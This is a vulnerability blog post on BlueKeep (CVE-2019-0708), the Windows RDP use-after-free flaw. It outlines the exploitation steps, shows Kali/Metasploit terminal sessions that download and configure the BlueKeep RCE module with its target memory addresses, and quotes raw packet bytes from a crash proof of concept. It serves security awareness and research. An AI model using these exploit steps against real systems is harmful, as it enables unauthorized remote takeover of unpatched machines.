Bluekeep the 2019 EternalBlue
We had a discussion about what was the most critical vulnerability
of 2019. After a heated debate we asked some friends and we managed to
cherry pick one. The choicen one is
Bluekeep
.
Summary:
Bluekeep is one of the most notorious software security vulnerabilities
of 2019. Bluekeep was discovered by the United kingdom’s
Nation Cyber Security Center and publicly announced by Microsoft in
Mars 2019 as serious vulnerability for RDP.
Microsoft considered the vulnerability so serious they decided to
release patches for the inactive systems Windows XP and Windows Server 2003.
Affecting:
- Windows 7
- Windows Server 2008
- Windows Vista
- Windows Server 2004
- Windows Server 2003
- Windows XP
systems that has RDP(Remote desktop protocol) enabled
The vulnerability has been given the CVE of CVE-2019-0708
Explanation of the vulnerability
This is a use after free vulnerability that
could be exploited by
- Creating a RDP connection with the MS_T120 virtual channel.
- Start a heap spray
- Invoke allocations via call to ExAllocatePoolWithTag in IcaChannelInputInternal such that the freed memory space is occupied with our data.
- Control the EIP(Extended Instruction Pointer, this is a memory address registry)
- Cause the UAF condition and execute your ring 0 shell code
Proof of concept
Metasploit has started to work on implementing bluekeep in metasploit.
This sets an important mile stone for Metasploit
that added bluekeep as its first Windows RDP exploit.
You can download the exploit here and try it with metasploit.
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/rdp# pwd
/usr/share/metasploit-framework/modules/exploits/windows/rdp
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/rdp# wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...\
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v5.0.46-dev ]
+ -- --=[ 1922 exploits - 1074 auxiliary - 330 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 4 evasion ]
msf5 >
msf5 > search bluekeep
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during c
onnect
RDP_CLIENT_NAME ethdev no The client computer name to report during
connect, UNSET = random
RDP_DOMAIN no The client domain name to report during co
nnect
RDP_USER no The username to report during connect, UNS
ET = random
RHOSTS yes The target address range or CIDR identifie
r
RPORT 3389 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic targeting via fingerprinting
root@kali:~# cat -n /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
106 # Windows 2008 R2 requires the following registry change from default:
107 #
108 # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
109 # "fDisableCam"=dword:00000000
110 #
111 [
112 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
113 {
114 'Platform' => 'win',
115 'Arch' => [ARCH_X64],
116 'GROOMBASE' => 0xfffffa8003800000
117 }
118 ],
119 [
120 # This works with Virtualbox 6
121 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)',
122 {
123 'Platform' => 'win',
124 'Arch' => [ARCH_X64],
125 'GROOMBASE' => 0xfffffa8002407000
126 }
127 ],
128 [
129 # This address works on VMWare 15 on Windows.
130 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)',
131 {
132 'Platform' => 'win',
133 'Arch' => [ARCH_X64],
134 'GROOMBASE' => 0xfffffa8018C00000
135 #'GROOMBASE' => 0xfffffa801C000000
136 }
137 ],
138 [
139 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
140 {
141 'Platform' => 'win',
142 'Arch' => [ARCH_X64],
143 'GROOMBASE' => 0xfffffa8102407000
144 }
145 ],
146 ],
The community is working on adding support for more Windows NPP addresses.
Pentest-tools.com has writen a guide on how to get the exploit working
Blue screen of death PoC
A proof of concept was published on github.com/Ekultek/BlueKeep
that when executed it will the kernel to crash and cause a blue screen of
death.
Log files
When the exploit script is being executed it will send the authentication package:
https://github.com/Ekultek/BlueKeep/blob/master/bluekeep_poc.py#L119
def client_info_pdu():
packet = (
"0300016102f08064000703eb7081524000a1a509040904bb47030000000e00080000000000000042007200770041006600660079"# here is the username defined | 42727741666679 is BrwAffy | this can be changed , as a poc of this we changed it to firo
#firo isn hexadecimal is 6669726F and then we need to fill out the buffer so we add some zeros and up with the result 6600690072006F000D000A0000 and the new string would look like 0300016102f08064000703eb7081524000a1a509040904bb47030000000e0008000000000000006600690072006F000D000A0000
"000000740074007400740000000000000002001c00310030002e0030002e0030002e003700360000000000000000000000400043" #tttt10.0.0.76@C
"003a005c00570049004e0044004f00570053005c00730079007300740065006d00330032005c006d007300740073006300610078" #:\WINDOWS\x00system32\mstscax
"002e0064006c006c000000a40100004d006f0075006e007400610069006e0020005300740061006e006400610072006400200054" #.dll a Mountain Standard T
"0069006d006500000000000000000000000000000000000000000000000b00000001000200000000000000000000004d006f0075"
"006e007400610069006e0020004400610079006c0069006700680074002000540069006d00650000000000000000000000000000"
"0000000000000000000300000002000200000000000000c4ffffff0100000006000000000064000000"
)
Scammers profiting off the vulnerability
Several people are claiming to have successfully created a PoC
for this vulnerability.
Like:
rdpexploit[.]com
cve-2019-0708[.]info
buyexploit[.]com
Vulnerable hosts
Robert david graham has released a scanner for detecting this
vulnerability and he has published a blog posts claiming that
over 9 million internet facing hosts are vulnerable.
Read it here
External links:
EternalBlue
Microsoft CVE-2019-0708 Advisory
Nation Cyber Security Center vulnerability annoncement
Zero day initiative’s write up
Packet Storm Security CVE-2019-0708
Sophos Bluekeep PoC
CVE-2019-0708 vulmon
Algo7 PoC
Windows Protection ring
Metasploit pull request #12283 for bluekeep
Metasploit announce the release of bluekeep
Stay up to date with Vulnerability Management and build cool things with our API
This blog post is part of the exploit of the day series
where we write a shorter description about interesting
exploits that we index.
